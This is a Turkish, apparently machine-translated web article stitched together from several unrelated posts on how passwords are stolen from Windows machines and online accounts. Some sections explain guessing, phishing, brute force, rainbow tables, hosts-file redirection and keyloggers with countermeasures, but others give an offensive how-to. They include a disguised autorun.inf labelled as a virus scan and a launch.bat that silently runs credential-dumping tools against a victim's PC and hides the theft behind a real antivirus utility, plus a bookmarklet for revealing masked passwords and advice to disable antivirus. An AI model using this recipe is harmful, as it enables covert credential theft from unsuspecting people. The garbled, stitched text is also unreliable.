Şifrelerimiz nasıl çalınır. Likbez. Windows'tan şifreler nasıl çalınır? Bir Vkontakte şifresinin çalınması ne kadar gerçektir?

Windows'tan şifreler nasıl çalınır?

Herkese merhaba, bugün kendime başka bir konuya "bağlanma" izni vereceğim ki bu bana öyle geliyor ki birçok kişinin ilgisini çekecek. Windows'ta kayıtlı tüm şifreleri görüntülememizi ve kaydetmemizi sağlayacak özel bir araç oluşturacağız. Senin ya da bir başkasının. Basit ifadeyle, şifreleri çalmak .

Konuyu geliştirelim. Hangi tarayıcıları kullanıyorsunuz? Pencerelerde kaç tane var? Aptalca bir soru: sosyal medya kullanıyor musun? Diğer sosyal projeler? Her birimizin bu tür birçok kaynağı var. Her biri, aynı tarayıcıda saklanan bir şifre gerektirir. O konforlu. Ama güvenli değil ve şimdi nedenini göreceksiniz. İzin verecek yardımcı programlar var şifreleri çalmak tarayıcılardan siteler için herhangi bir şerit.

Yönlendirici şifrenizi mi unuttunuz? Yoksa ayrı bir kablonuz mu var? Fark yok - pakete dahil olan yardımcı program izin verecektir internet şifrelerini çalmak. Windows'u dürüstçe zor kazandığınız para için mi satın aldınız? Satın alınan bilgisayar ve dizüstü bilgisayarla birlikte mi kuruldu? Ancak ağa her girdiğinizde, Windows gerçekleştirilen sonuçları veritabanıyla kontrol eder. Benzersiz bir Windows aktivasyon anahtarı, kimlik doğrulama için bir ön koşuldur. Nerede saklandığı da konuşacağız. izin verecek bir araç var sistemin anahtarlarını ve şifrelerini çalmak. Paketin anahtarı da olacak. Microsoft Office...

tam görünümde…

Bilgisayarınızda e-posta istemciniz var mı? Microsoft Outlook, Filezilla, Mozilla Thunderburd? Postayı girdiğinizde, posta istemcisi posta kutularına şifreleri posta sunucusu sunucularına gönderir ... İzin verecek bir yardımcı program var posta kutularının şifrelerini çalmak.

Şimdi size sadece birkaç fare tıklamasıyla pencerelerden en sırrı çıkarmanın nasıl mümkün olacağını göstereceğim.

Ve herhangi bir biçimdeki uzak programlar ve tarayıcılar için bile parolalar.

Windows'tan şifreler nasıl çalınır?

programları kullanacağız NirSoft. Geliştiricilerin birçok "yararlı" yardımcı programı vardır. Şimdi, belirli görevlerde bize yardımcı olacak olanları ele alacağız. Sunulan tüm programların taşınabilir bir sürümü vardır, kurulum gerekli değildir. Bununla birlikte, üreticinin web sitesinde, Ruslaştırma dosyalarını da indirebilirsiniz. sistemden şifre çalmak, çok önemli değiller.

Pencerelerden "şifreleri çalmak" için şunlara ihtiyacımız var:

• ücretsiz bir flash sürücü (parolalar için kimlik avı için "keskinleştirildikten" sonra bile amaçlanan amacı için kullanılabilir);
• gerçek programların toplanması (bunu doğrudan sitemden indirebilirsiniz)
• Not Defteri belgeleriyle birkaç manipülasyon.

• Bu programların yarısı tarayıcı tarafından indirme aşamasında bile “kötü amaçlı yazılım” olarak tanımlanıyor. Antivirüsler hakkında ne söyleyebiliriz ... Yani oluşturduğunuz aracı kullanmadan önce antivirüsün DEVRE DIŞI BIRAKILMASI gerekecek.
• bazı yardımcı programları çalıştırmak yönetici hakları gerektirir

İNDİRİLEN KURULUMUN VİRÜS OLMADIĞINI GARANTİ EDİYORUM. ANCAK PROGRAMLARIN EYLEM DOĞASI, SNIFEERS'IN EYLEMİ GİBİDİR. BÖYLECE ANTİ-VİRÜS ÇOKLU “SORUNLARI” RAPORLAYACAKTIR.

İşe başlıyoruz.

• Antivirüsü devre dışı bırakalım. Geçici.
• . En azından biraz zaman ayırmak ve bu tür programları sevmeyen arama motorlarının "yasağı" kapsamına girmemek için iki kez paketledim. arşiv için şifre

bilgisayar76

• Flash belleğimizi hazırlıyoruz. Evet, pişirecek bir şey yok, çok az yer gerekecek. Neden bir flash sürücü? Taşınabilir, bazen küçük boyutlu ve hatta görünmez. Manipülasyonlarınız, kahve içmek için mutfağa gitmesi gereken kurban için bile görünmez kalabilir.
• Programları bir flash sürücüye sıkıştırın. Herhangi bir klasörde değil, USB flash sürücüyü açtığınızda kullanılabilir olmaları için doğrudan bir yolda. Paketlenmemiş yardımcı programlar, toplu olarak adlı bir yarasa dosyasını çalıştıracaktır. başlangıç .

Bu yarasa dosyası normal Not Defteri'nde oluşturuldu. burayı oku. Belge, yardımcı programları otomatik olarak başlatmak ve bunları uygun metin dosyalarına kaydetmek için kod içerir. Aynı Not Defteri'ni kullanarak yeniden adlandırabilir ve kompozisyonunu görüntüleyebilirsiniz.

Toplu iş dosyasını çalıştırdıktan sonra, programların her biri sizin (veya başkasının) tüm parolalarıyla ayrı bir pencerede açılır ve / veya bulunan parolaları görüntüleyecek bir metin dosyası oluşturmaya çalışır. Opera, Firefox, internet gezgini, posta istemcileri ve çoğu pencereler. Her şey birkaç saniye sürecek. Bilgisayarınızda yavaşça pratik yapın.

Edinilen becerilerin bir başkasının bilgisayarında doğru, hızlı ve olabildiğince ihtiyatlı bir şekilde nasıl kullanılacağını aşağıdaki makalelerden birinde ele alacağız.

Okuma: 321

Hepinize iyi günler. Yılbaşı ve kış tatili bitti ve bloga bir şeyler yazmanın zamanı geldi. Bu yılın ilk girişini, önceki yayınlardan birinin aksine, parola çalma yöntemleri üzerine bir eğitim programına adamak istiyorum: "Saldırıya uğradığınızda", tüm parolaları değiştirmek için koşmanız gerekmez. Materyalin bilgi güvenliği konusunda uzman olmayan kişilere yönelik olduğu ve yalnızca bilgilendirme amaçlı olduğu hemen açıklığa kavuşturulmalıdır. Her ne kadar belki de uzmanlar kendileri için yeni bir şeyler alacaklar.

Herkes şifrelerden ne kadar nefret etse de, bugüne kadar en popüler tanımlama aracı olmaya devam ediyor, ancak ne yazık ki bazen bizden çalınıyorlar. İki faktörlü kimlik doğrulama, sorunu kısmen çözmeye yardımcı olur, ancak yalnızca kısmen ve yalnızca en kritik hizmetler için.

İstatistiklere göre, hesaplar üzerindeki kontrolü kaybetmenin en yaygın nedenleri iki şey: basit (sözlük) şifrelerin kullanılması ve sosyal mühendislik. Bu yazıda, doğal olarak, geniş bir kitleyi bu konuda bilinçlendirmek için şifre kırmanın ana yöntemlerinden bahsedeceğim (materyallerin yıkıcı amaçlarla kullanılması kanunen cezalandırılır, yazarı sorumlu değildir vb. bla bla bla ).

1. tahmin

Evet, bu kadar basit. Parolanız aptalca tahmin edilebilir. Hollywood filmlerindeki karakterlerin birinin bilgisayarına girip çocukların, büyükanne ve büyükbabaların, amcaların, teyzelerin, kurbanın evcil hayvanlarının adlarını vb. parola olarak denediği bölümleri hatırlıyor musunuz? Yani, bu gerçekten etkili bilgisayar korsanlığı yöntemlerinden biridir ve bu arkaik yöntem hala etkilidir. Sonuçta, artık herkes sosyal ağlarda kendisi hakkında tonlarca bilgi yayınlıyor ve eğer şifre, saldırıya uğramış hesabın sahibinin kimliğiyle ilgili bazı verilere dayanıyorsa, o zaman şifreyi tahmin etmek an meselesidir (şifrelerin periyodik olarak değiştirilmesinin gerekli olmasının nedeni budur).

Yönteme muhalefet: Genel olarak, Tanyushka siz değil, sevgili torununuz olsa bile "tanyushka1990" ın kötü bir şifre olduğunu anladığınızı umuyorum. Sezgisel olmayan şifreler kullanın. En azından kritik hesaplar için periyodik olarak (yılda en az bir kez) parolaları değiştirin.

1. sosyal mühendislik

Sosyal mühendislik geniş bir kavramdır. Bir toplum mühendisi, kurbanla hem yüz yüze hem de telefonla etkileşim kurabilir, ancak çoğunlukla elektronik iletişim kanalları - anlık mesajlaşma programları, sosyal ağlar, e-posta - aracılığıyla etkileşim kurar. Ve burada sosyal mühendislik yöntemlerini bu şekilde düşünmeyeceğiz, burada size türün klasiklerini - V. Simon ve K. Mitnick'in "The Art of Deception" kitabını okumanızı tavsiye ederim. Burada önemli olan, şifrelerin çalınması açısından sosyal mühendislik yöntemlerinin mağduru kendi şifresinden vazgeçmeye zorlama amacını taşımasıdır. Bir örnek şuna benzer: Saldırgan kendisini yeni bir sistem yöneticisi olarak tanıtır ve kuruluşunuzdaki bir çalışana, bir tür küresel vakum testi gerçekleştirmek için bu çalışanın e-postasının parolasına ihtiyacı olduğunu söyler. Saldırgan ile kurban arasında kişisel bir iletişim olmadığı başka bir örnek: kimlik avı bağlantısı ve bir alarm mesajı içeren bir hayran postası (örneğin, hesabınız rapor edildi, bloke edildi ve blokeyi kaldırmak için bağlantıyı takip etmeniz "gerekiyor"). Kimlik avı bağlantısı, saldırgan tarafından önceden hazırlanmış bir sayfaya yönlendirir ve vk.com, gmail.com, facebook.com gibi popüler bir hizmetin yetkilendirme sayfasına birebir benzer. Sonra ne olur: kurban, bunun yasal bir hizmet olduğunu düşünerek kullanıcı adını ve parolasını girer, bu tanımlama verileri saldırgana gönderilir, bir hata mesajı görüntülenir (pekala, hangimiz parola girerken hiç hata yapmadı? Her şey olabilir!) ve ardından kullanıcı gerçek bir yetkilendirme sayfasına yönlendirilir, çünkü kirli iş zaten yapıldı ve kurbanı sahte bir sayfada tutmanın bir anlamı yok. Bu arada, Windows'un neden oturum açmadan önce Alt-Ctrl-Del tuş kombinasyonuna basmanızı istediğini başka biri bilmiyorsa, kesinlikle google'a girip okumanızı tavsiye ederim.

Yönteme karşı tepki: genellikle işletmeler, sosyal mühendisliğe karşı koymak için hibrit yöntemler kullanırlar (doğal olarak, genellikle bilgi güvenliği sorunlarıyla ilgilendikleri işletmelerde), ancak bir toplum mühendisi kurbanla herhangi bir iletişim kanalı kullanmadan etkileşime girebileceğinden (ve buna bağlı olarak, onun mesajlarını filtreleyemeyeceğiz, engelleyemeyeceğiz, izleyemeyeceğiz), karşı koymanın tek gerçekten etkili yöntemi çalışanları (iyi ya da kişisel güvenlikten bahsediyorsak kendinizi) sosyal mühendislik yöntemleri hakkında bilgilendirmektir. Gerçekten de bugünlerde çok az insan Nijeryalı bir prensin mirasına kanacak ya da boşanacak.“Anne, XXXX rakamına para koy. Daha sonra açıklayacağım, ”ama bu yöntemler bir kez işe yaradı.

1. gözetleme

Burada sadece monitöre yapıştırılan çıkartmalardaki veya klavyenin altındaki kağıt parçalarındaki şifreler gibi bariz şeylerden kısaca bahsedeceğim. Burada gözetleme, şifre yazma işleminde gözetleme olarak da anlaşılabilir. Yani, işlemi kimse izlemiyorken şifreyi girmek daha iyidir. İlginç yeteneklere sahip insanlar var. Örneğin, tanıdıklarımdan biri, bir dizüstü bilgisayarda şifreyi girmemi izleyeceğine ve ardından şifre girişini kendisinin tekrarlayacağına dair benimle iddiaya girdi. Ve gerçekten yaptı. Çok şaşırdım, çünkü on parmakla dokunmatik aramaya sahibim ve şifremi çok hızlı girebiliyorum. Arkadaşın özel bir fotoğrafik hafızası olduğu ortaya çıktı. Tehlikeli adam =)

Yani gözetleme, bir saldırganın hızlı bir şekilde hazır bir parola almasına ve daha sonra tartışılacak olan daha karmaşık veya yoğun kaynak gerektiren diğer tekniklere başvurmamasına yardımcı olur. Ancak şifreyi "gözlerle" gözetlemek tek yol değildir. Örneğin, parolanızı başka birinin bilgisayarına girdiyseniz ve yanlışlıkla parolayı kaydettiyseniz, hesabınızdan çıkış yaptıysanız ancak verileri temizlemediyseniz, başka biri yalnızca parolayı bilmeden hesabınıza girmekle kalmaz (bu o kadar da kötü değildir), aynı zamanda bu basit komut dosyasını oturum açma bilgilerinin ve parolanın girildiği sayfada (yıldızlarla gizlenmiş) tarayıcının adres çubuğuna yapıştırarak bu parolayı açıkça çıkarabilir:

javascript:(function()(var%20s,F,j,f,i;%20s%20=%20%22%22; %20F%20=%20document.forms;%20for(j=0;%20j)

[saklamak]

Parola başka hesaplarda kullanılıyorsa, bir saldırgan bunlara da erişebilir. Bu nedenle güvenlik uzmanları kategorik olarak aynı şifrenin farklı hesaplar için kullanılmasını önermemektedir.

Önlem: Yanınızda birisi durup ellerinize bakarken şifrenizi girmeyin. Güvenilmeyen cihazlarda şifrenizi girmeyin. Yine de yapmak zorundaysanız, parolalar ve tanımlama bilgileriyle ilgili bilgileri temizlemeye özen gösterin. Ek olarak, keylogger'lar güvenilmeyen cihazlara kurulabilir.

1. sözlük şifre seçimi

Sezgisel ve hileli şifre ele geçirme tekniklerinden teknik tekniklere sorunsuz bir şekilde geçtik. Bunlardan ilki, sözlükler kullanılarak şifre seçimidir. Belki de bilgi güvenliği alanında uzman olmayan kişiler bile, çeşitli posta hizmetlerindeki posta kutularına büyük miktarda parola sızıntısı olduğu haberlerini duymuşlardır. Daha sonra ortaya çıktığı gibi, bu sızıntıların çoğu, hizmet sağlayıcının sunucularının hacklenmesiyle değil, sözlükler kullanılarak posta kutuları için banal parola seçimiyle ilgiliydi. "Saldırıya uğramış" posta kutularının şifrelerinin çoğu "123456", "qwerty" ve benzeri kombinasyonlardı. "Malzemeler" bölümünde, hem Karındeşen John hem de Hydra gibi çeşitli araçlarda kullanılabilen veya şifrenizin sözlükte olup olmadığını sıradan bir arama ile kontrol etmek için kullanılabilen şifreli birkaç sözlük yayınladım (bunları kendiniz doldurabilirsiniz). Varsa, acilen değiştiriyoruz!

Yönteme muhalefet: karmaşık, sözlük dışı şifrelerin kullanılması.

1. kaba kuvvet

Yöntemin adı iki İngilizce kelimeden gelir: brute - brute ve force - force. Adından, bu yöntemin öncekinden ne kadar farklı olduğu sezgisel olarak açıktır - tüm olası şifre kombinasyonları burada basitçe sıralanır. Yöntem, zaman ve kaynaklar açısından maliyetlidir, çünkü bu yöntemle yapılan seçim, önemli miktarda hesaplama kaynağı gerektirir. Bu nedenle, saldırganlar bu yönteme yalnızca aşırı durumlarda başvururlar. Örneğin, parolanın tam uzunluğunu bilmek veya parolanın özel karakterler ve sayılar içermediğini bilmek kaba kuvvet süresini azaltmaya yardımcı olabilir. Böylece olası kombinasyonların sayısı azaltılır.

Yönteme muhalefet: uzun kaotik şifrelerin kullanılması ve periyodik şifre değişiklikleri.

1. gökkuşağı tabloları

Son yıllarda herhangi bir hizmet için şifreyi kurtarmak zorunda kalan herkes, daha önce bazı hizmetler size şifrenizi e-posta ile göndermişse, şimdi hemen yeni bir şifre bulmanız gerektiğini fark etmiş olmalıdır. Bunun nedeni, kendine saygısı olan hiçbir hizmetin şifreleri açık metin olarak saklamamasıdır. Parolalar karma olarak saklanır. Kısacası, hash, bir metni (bizim durumumuzda bir parolayı) geri alınamaz bir matematiksel işlevle dönüştürmenin sonucudur. Ortak MD5 algoritmasının "şifre" kelimesine (tırnak işaretleri olmadan) dönüştürülmesinin sonucu aşağıdaki gibidir:. Yaklaşık olarak bu formda, hizmet sağlayıcılarımız şifrelerimizi saklar ve işlevlerin geri döndürülemez olduğuna inanıldığı için, sağlayıcıların kendileri şifremizi bilemez ve bize açık metin olarak gönderemezler. Karma hakkında daha fazla bilgi edinebilirsiniz.

Gökkuşağı tabloları, çok kabaca konuşursak, bir şifreyi hash ile kurtarmanıza izin verir. Tüm süreç elbette göründüğünden çok daha karmaşıktır. Bu nedenle teknolojiyi daha detaylı tanımak isteyenler wikipedia sayfasından başlayabilirler. Görünüşe göre gökkuşağı tablolarının yardımıyla hemen hemen her şifreyi kırmak mümkün olacak, ancak burada bile bir saldırgan için zorluklar var. Kaba kuvvet, numaralandırmanın kendisi için zaman ve kaynak maliyeti gerektiriyorsa, gökkuşağı tabloları söz konusu olduğunda, aynı tabloları oluşturmak için aynısı gerekir. Aynı zamanda, herhangi bir gökkuşağı tablosu kümesinin birçok kısıtlaması olacaktır, bunlar şunları içerir: parolanın uzunluğuna ilişkin bir kısıtlama, karakter kümesine ilişkin bir kısıtlama, belirli bir karma algoritmaya ilişkin bir kısıtlama. Kamu malı olan ağda, her iki durumda da yalnızca İngiliz alfabesinin harflerini içeren, ancak özel karakterler ve sayılar içermeyen 6 karakterden uzun olmayan şifreleri tahmin etmek için gökkuşağı tabloları bulabilirsiniz. Ama şimdi daha ciddi bir şey için para istiyorlar.

Yönteme muhalefet: karma tuzlama. Ne yazık ki, bu tür bir karşı önlem, yalnızca hizmet yöneticileri düzeyinde mevcuttur ve son kullanıcının eylemlerine bağlı değildir.

1. Hibrit Yöntemler

Hibrit yöntemler, yukarıda listelenen çeşitli yöntemlerin birlikte ele alındığında bir kombinasyonunu ifade eder. Aslında, "kaba kuvvet" + "peep" yöntemlerinin kullanımına ilişkin bir örnek zaten yukarıda verilmiştir. Örneğin, bir saldırgan parolanın tamamını değil, yalnızca parolayı oluşturan karakterleri görebilir. Bu, kaba kuvvet sırasında parametrelerde yalnızca gerekli karakterleri belirtmesine ve geri kalan her şeyi aramanın dışında bırakmasına olanak tanıyacak ve böylece olası kombinasyonların sayısını önemli ölçüde azaltacaktır.

Hibrit yöntemin başka bir örneği: bir sözlük sözcüğü alınır ve harfler özel karakterlerle değiştirilir. Örneğin sözlük şifresi “password” alınır ve “password123”, “ [e-posta korumalı]”, “pa$$w0rd”, vb.

Karma yöntemlere karşı koymak, yukarıda verilen tüm karşı önlemleri kullanmaktır.

gerçek hapis cezası!

Bir bilgisayara erişiminiz varsa, ancak kurbanın hiçbir şeyden şüphelenmemesi için şifreleri nasıl çalabileceğinizi anlamaya çalışalım.

Bunun bir yolu, tarayıcılardan ve kullanıcının rahatlığı için parolaları depolayan diğer programlardan parola çıkarabilen yardımcı programlara sahip özel bir flash sürücü oluşturmaktır.

İhtiyacımız olan Şifre Kurtarma yardımcı programlarını indirin:

* MessenPass - en popüler anlık mesajlaşma programlarının şifrelerini kurtarır: MSN Messenger, Windows Messenger (Windows XP'de), Windows Live Messenger (Windows XP ve Vista'da), Yahoo Messenger (Sürüm 5.x/6.x), ICQ Lite 4.x/5.x/2003, AOL Instant Messenger, AIM 6.x, AIM Pro, Trillian, Miranda ve GAIM;

* Mail PassView - e-posta istemcilerinden kayıtlı parolaları alır: Outlook Express, Microsoft Outlook 2000 (yalnızca POP3/SMTP Hesapları), Microsoft Outlook 2002/2003/2007, Windows Mail, IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird, Group Mail Free ve Web tabanlı e-posta hesapları;

* IE Passview - "eşek" tarafından kaydedilen oturum açma bilgilerini ve parolaları görüntüler;

* ChromePass - Google Chrome tarayıcısı tarafından kaydedilen oturum açma bilgilerini ve şifreleri görüntüler;

* PasswordFox - Firefox tarafından kaydedilen tüm şifreleri alır";

* Korumalı Depolama PassView - güvenli depolamada saklanan tüm şifreleri kurtarır;

* Dialupass - çevirmeli/VPN oturumlarının tüm şifrelerini çıkarır;

* Ağ Parolası Kurtarma - yerel ağda paylaşım için kullandığınız parolaların yanı sıra .NET Passport/Messenger hesabının parolalarını görüntüler;

* PstPassword - Outlook kişisel klasör dosyalarından parolaları çıkarır - .PST;

* WirelessKeyView - Bilgisayarınızda depolanan tüm kablosuz ağ anahtarlarını (WEP/WPA) alır.

OperaPassView yardımcı programı da var, ancak henüz komut satırını desteklemiyor. Bu nedenle setimize dahil etmiyoruz.
Tüm yardımcı programlar alınabilir.

Ayrıca Hidden Start () yardımcı programına da ihtiyacımız var.

Yardımcı programlarımızı gizlemek için de indireceğiz. Şifre kırma işlemi sonunda çalıştıracağız. Ve kurbanın ekranında sadece yaptığı iş görülecektir.

Flaş hazırlanıyor.

1. Flash sürücüde iki klasör oluşturun:
flash sürücü:\prog\
flash sürücü:\prog\log\

2. Flash sürücü klasöründe: \ prog \ tüm yürütülebilir dosyaları doldurun - yardımcı programlar, hstart.exe, KK.exe

3. Flash sürücünün kökünde, aşağıdaki içeriğe sahip bir autorun.inf oluşturun:

open=prog/hstart /NOCONSOLE "launch.bat"
EYLEM= Bilgisayarda virüs taraması yapın

Burada action flash sürücü bağlandığında action seçim penceresinde görüntülenecek buton, open ise bu action seçildiğinde çalıştırılacak komuttur. Bu komut, Hidden Start yardımcı programı kullanılarak toplu iş dosyasının gizli modda çalıştırılmasını içerir.

4. Bir toplu iş dosyası launch.bat oluşturun:

Eko kapalı
echo %bilgisayaradı%\%kullanıcıadı% bte% %time% >> prog/log/_log.txt
prog/ChromePass.exe /stext prog/log/%computername%_chrom.txt dosyasını başlatın
prog/Dialupass.exe /stext prog/log/%computername%_dialupass.txt'yi başlat
prog/iepv.exe /stext prog/log/%bilgisayaradı%_iepv.txt'yi başlat
prog/mailpv.exe /stext prog/log/%bilgisayaradı%_mailpv.txt'yi başlat
prog/mspass.exe /stext prog/log/%bilgisayaradı%_mspass.txt'yi başlat
prog/netpass.exe /stext prog/log/%computername%_netpass.txt dosyasını başlatın
prog/pspv.exe /stext prog/log/%computername%_pspv.txt dosyasını başlat
prog/PstPassword.exe /stext prog/log/%computername%_pstpassword.txt dosyasını başlatın
prog/WirelessKeyView.exe /stext prog/log/%computername%_wirelesskeyview.txt dosyasını başlatın

Mevcut Değilse "%programfiles%\Mozilla Firefox\" Sona Git
prog/PasswordFox.exe /stext prog/log/%computername%_passwordfox.txt'yi başlat
:Son
startprog/KK.exe

Toplu iş dosyasının komutlarını daha ayrıntılı olarak ele alalım:

yankı kapalı - yürütme sonuçlarının CMD penceresine çıkışı yasaklar

echo %computername%\%username% Ъte% %time% >> prog/log/_log.txt - prog/log/_log.txt dosyasına bilgisayar adını, kullanıcı adını, tarihi ve saati yazın

prog/ChromePass.exe /stext prog/log/%computername%_chrom.txt'yi başlatın - çalıştırıldığında şifreleri prog/log/computername_chrom.txt dosyasına kaydetmesi gereken ChromePass.exe yardımcı programını çalıştırın

Aynısı diğer yardımcı programlar için de geçerlidir. Tek not, PasswordFox.exe'yi çalıştırmadan önce, kurbanın bilgisayarında FF'nin kurulu olup olmadığını kontrol edeceğiz. Basitçe, FF kurulu değilse, PasswordFox.exe yardımcı programı bir hata mesajı görüntüler.

prog/KK.exe'yi başlatın - Kaspersky Lab'den Net-Worm.Win32.Kido solucanını kaldırmak için gerçek bir yardımcı program çalıştırarak eylemlerimizi maskeliyoruz

Her şey - flash sürücü hazır. Artık bir saldırganın kurbanın bilgisayarına bir flash sürücü bağlaması ve bu bilgisayarda kayıtlı tüm parolaları çıkarmak için açılan açılır pencerede "Bilgisayarı virüslere karşı tara" öğesini seçmesi yeterlidir. "Virüs taraması" çalıştırmanın mantığı oldukça basittir, özellikle de kurban size güveniyorsa.

Nasıl savaşılır?

1. Parolaları kaydetmeyin - Parola Saklayıcı veya e-Cüzdan gibi bazı programları kullanmak daha iyidir.

3. Normal bir antivirüsün varlığı gereklidir! Yine de bu yardımcı programlardan yalnızca birkaçına yemin edecek.

Bu makalenin yazılma nedeni "Hacker" dergisindeki bir nottu.

Bu makale yalnızca bilgi amaçlı yazılmıştır.
Amacı, verilerinizi davetsiz misafirlerden korumaktır.
Farkında olan silahlıdır!

Başkalarının şifrelerinin çalınması, Sanatın 1. Bölümü uyarınca cezai sorumluluk gerektirir. Rusya Federasyonu Ceza Kanunu'nun 272'si "Bilgisayar bilgilerine yasa dışı erişim" ve tehdit ediyor gerçek hapis cezası!

Son günlerde, haberlerde milyonlarca Google posta (Gmail), Yandex posta ve mail.ru posta kutusundaki oturum açma bilgilerinin ve şifrelerin İnternet'te yayınlandığı söylendi. Hizmetlerin çoğu, birkaç hatadan sonra kullanıcıdan bir captcha girmesini isteyecek veya yalnızca kaba zorlamanın gerçekleştirildiği IP'yi engelleyecek şekilde yapılandırıldığından, az çok karmaşık bir parola almak imkansızdır. Parola sızıntılarının ezici çoğunluğu, popüler hizmetlerin kurnazca hacklenmesinden değil, parolanın ele geçirilmesine izin veren kullanıcıların kendilerinden kaynaklanmaktadır. Bu nedenle bilgisayar korsanlarının şifrelerinizi nasıl çaldığı ve bunun önüne geçmek için neler yapılabilir sorusuna değinmek istiyorum.

1. Sahte Giriş Sayfaları

Sonuç olarak bu. Herhangi bir bahane altında, kullanıcı bir bilgisayar korsanının sitesine çekilir. Çoğu zaman, bu sitede yalnızca bir sayfa bulunur, ancak bu, posta kutunuzdaki gerçek yetkilendirme sayfası gibi görünür. Dikkatsiz bir kullanıcı, doğrudan saldırgana giden bir kullanıcı adı ve şifre girer.

Nasıl savaşılır:

- her yetkilendirme gerektiğinde, etki alanına bakın. Çoğu zaman, saldırganlar ünsüz alan adları oluşturabilir, örneğin:

www.mail.ru.free-host.net

www.yandex-ru.spb.ru

www.gmail-com.com

www.yandex.ru.mail.redte.ru

www.turian.ru/mail.ru

www.mail-compose.ru/yandex

145.35.77.1/mail.ru

Bu alan adlarının her birinin popüler e-posta hizmetleriyle hiçbir ilgisi yoktur. Kural olarak, her seferinde yetkilendirme talep edilmez, bu nedenle bir şifre girmeden önce alan adını araştırmak için biraz zaman ayırın.

Ayrı olarak, bilgisayar korsanlarının sizi nasıl kötü amaçlı sayfalarına çekmeye çalıştıklarına da dikkat etmelisiniz. Birkaç örnek vereceğim, ancak seçeneklerle sınırlı değiller:

- postada size bir şey (bir kartpostal veya başka hoş bir şey veya tam tersi - çok hoş olmayan bir şey) aldığınızı bildiren bir mektup alırsınız ve hesabınızın bloke edilmemesi, paranın kaybolmaması vb.

- SMS bir mektup aldığınızı bildirir ve bu mektubu okumak için bağlantıyı takip etmeye davet edilir (böylece erkeklerde beyin kapanır, mektubun ne olduğu netleştirilebilir)<любое женское имя>).

- sitelerde veya programlarda açılır pencerelerde e-posta aldığınız bildirilir.

Bunu unutma, sadece dikkatli ol. Küçük şeylere dikkat edin. Örneğin, tarayıcıda sık sık "Parolayı kaydet" seçeneğini seçiyoruz ve gerçek bir posta hizmeti yeniden yetkilendirme istediğinde (bu zaman zaman olur), o zaman her iki pencere de (hem oturum açma hem de parola) genellikle zaten doldurulmuştur ve yalnızca oturum açma düğmesine basmamız gerekir. Bilgisayar korsanları kullanıcı adınızı girebilir (özellikle size e-postayla kötü amaçlı bir bağlantı gönderdiyse), ancak bilgisayar korsanları parolanızı giremez. Bu nedenle, olağandışı bir davranış fark ederseniz etki alanına yakından bakın. Alan adı doğruysa, ancak yine de bir şeyler yanlışsa, bir sonraki paragrafta tartışılan farklı bir sorununuz olabilir.

2. Hosts dosyası aracılığıyla yönlendirme

Windows işletim sistemini çalıştıran herhangi bir bilgisayarın C:WindowsSystem32Driversetc dizininde bulunan bir hosts dosyası vardır.

Orada bir yönlendirme kaydedebilirsiniz. Sonuç olarak, tarayıcınızın adres çubuğundaki etki alanı tamamen doğru olacaktır, ancak gerçekte, elbette şifrenizi çalacak olan bilgisayar korsanlarının yetkilendirme sayfasına yönlendirileceksiniz:

Bakılacak şey:

- C:WindowsSystem32Driversetchhosts dosyasını herhangi bir metin düzenleyiciyle açın ve içine bakın - popüler sitelerden veya şüpheli bir şeyden söz edilmemelidir;

- başka bir gösterge, doğru kullanıcı adı ve şifreyi girdiğiniz, ancak yetkilendirmenin gerçekleşmediğidir;

- Yetkilendirme sayfasında sizden herhangi bir bahane ile kısa bir numaraya SMS göndermeniz istenir (telefon onayı, hack girişimi ve siz olduğunuzun teyidi, hesabın aktif olmadığı ve onaylanmaması halinde silineceği, SMS yanıtına gelen numaraları girmelisiniz vb.).

Nasıl başa çıkılır bununla:

- genellikle hosts dosyası virüsler tarafından değiştirilir, yoksa bir anti-virüs programı kurmanız ve bilgisayarı kontrol etmeniz gerekir. Bir virüsten koruma programınız varsa, güncelleyin ve bilgisayarınızı kontrol edin.

- hosts dosyasından fazla satırları kaldırın

3. Klavyede tuş vuruşlarını izlemek için programlar (kiloger)

Başka bir seçenek kiloheres. Bunlar, klavyede yazdığınız her şeyi yakalayan ve bilgisayar korsanına gönderen programlardır. Aslında bunlar virüslerdir ve bu programlarla diğer virüslerle aynı şekilde uğraşmanız gerekir. Postanız sürekli olarak "saldırıya uğruyorsa", bilgisayarınızı bir virüsten koruma yazılımıyla kontrol edin, şüpheli yürütülebilir dosyaları indirmeyin (bunlar .exe, .msi, .hta, .scr uzantılarına sahiptir, bazıları olabilir, ancak çoğu zaman hala .exe). Güncellenebilen bir antivirüs yükleyin, düzenli olarak güncelleyin ve bilgisayarınızı kontrol edin (peki ya da Linux'a geçin).

Nasıl başa çıkılır bununla:

- bir virüs bulursanız, her ihtimale karşı posta ve sosyal ağlardaki şifrelerinizi değiştirin;

- bundan daha önce bahsedilmişti, ancak bu o kadar yaygın bir hata ki, tekrar vurguluyorum, şüpheli kaynaklardan yürütülebilir dosyalar indirmeyin. Bunları resmi sitelerden indirin. Tanımadığınız kişilerden size posta yoluyla gönderilen dosyaları ("mayolu benim" fotoğraflarım olsa bile) indirmeyin. Yürütülebilir dosyalara, tanıdığınız kişiler tarafından gönderilmiş olsalar bile dikkat edin - onların postaları sizinkinden önce ele geçirilmiş olabilir ve bilgisayar korsanı onların adına kötü amaçlı programlarını gönderebilir;

- İnternet kafelerde ve her durumda, başka birinin bilgisayarına giriş yapmanız gerektiğinde, ekran klavyesini kullanın, bu% 100 garanti değildir, ancak birçok kilo için bu dönüş çok zor olacaktır.

Kulağa ne kadar sıkıcı gelse de, çoğu kullanıcı şifrelerini o kadar önemsiz şekillerde kaybediyor ki burada ne posta hizmetlerine yönelik karmaşık bilgisayar korsanı saldırıları ne de karmaşık kriptanaliz gerçekleşmiyor.

Bir sosyal ağda veya başka herhangi bir çevrimiçi kaynakta parola çalmanın suç teşkil ettiğini herkes bilmiyor. Böyle bir hırsızlık ne kadar gerçektir, suçlunun bunun için ne tür bir ceza alabileceğini ve mağdur olursanız ne yapacağınızı aşağıda anlatacağız.

Bir Vkontakte şifresinin çalınması ne kadar gerçektir?

VK şifresini ele geçirmek oldukça gerçektir, bu tür bir hırsızlık hesap sahibi için olumsuz sonuçlara yol açabilir. Kişisel bilgileri elde etmek veya sahibinin itibarını zedeleyen bilgileri yaymak için hesapların nasıl ele geçirildiğine dair internette birçok hikaye var.

Hırsızlık çeşitli şekillerde gerçekleştirilir:

• kimlik avı kullanarak: kullanıcı, sitenin sahte bir sayfasına yönlendirilir ve burada kendisinden bir kullanıcı adı ve şifre girmesi istenir ve bunlar daha sonra saldırganlar tarafından ele geçirilir;
• kombinasyonları seçerek: bu yöntem, parola çok basitse işe yarar;
